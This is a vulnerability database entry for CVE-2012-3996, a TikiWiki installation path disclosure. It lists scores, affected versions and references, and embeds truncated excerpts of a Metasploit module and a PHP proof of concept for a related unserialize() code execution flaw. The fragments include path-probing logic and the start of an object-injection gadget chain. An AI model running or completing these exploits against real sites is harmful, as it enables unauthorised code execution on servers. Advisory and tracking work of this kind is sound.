CVE-2012-3996
Published 2012-07-12
Priority P4 | 22 | medium | 5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 4.59% (90.5th percentile)
TikiWiki CMS/Groupware 8.3 and earlier allows remote attackers to obtain the installation path via a direct request to (1) admin/include_calendar.php, (2) tiki-rss_error.php, or (3) tiki-watershed_service.php.
Affected
24 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tiki | tikiwiki_cms_groupware | <= 8.2 | — |
No detection rules found.
Exploit-DB
Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit)
exploitdb·2012-07-09
---
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Tiki Wiki %q{
This module exploits a php unserialize() vulnerability in Tiki Wiki
[
'EgiX', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2012-0911' ],
[ 'BID', '54298' ],
[ 'EDB', '19573' ],
[ 'URL', 'http://dev.tiki.org/item4109' ]
],
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
'DisableNops' =
```
Exploit-DB
Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution
exploitdb·2012-07-04
---
```php
(.*)tiki-rss/', http_send($host, $packet), $m)) die("\n[-] Path not found!\n");
return $m[1];
}
print "\n+----------------------------------------------------------------------+";
print "\n| Tiki Wiki CMS Groupware \n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /tiki/\n";
die();
}
list($host, $path) = array($argv[1], $argv[2]);
$f_path = get_path();
print "\n[-] Path disclosure: {$f_path}\n";
class Zend_Search_Lucene_Index_FieldInfo
{
    public $name = '';
}
class Zend_Search_Lucene_Storage_Directory_Filesystem
{
    protected $_dirPath = null;
    public function __construct($path)
    {
        $this->_dirPath = $path;
    }
}
interface Zend_Pdf_ElementFactory_Interface {}
class Zend_
```
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2012-07/0020.html
http://dev.tiki.org/item4109
http://info.tiki.org/article190-Tiki-Wiki-CMS-Groupware-Updates-Tiki-6-7-LTS
http://info.tiki.org/article191-Tiki-Releases-8-4
http://www.exploit-db.com/exploits/19573
http://www.exploit-db.com/exploits/19630
http://www.osvdb.org/83533
Published: 2012-07-12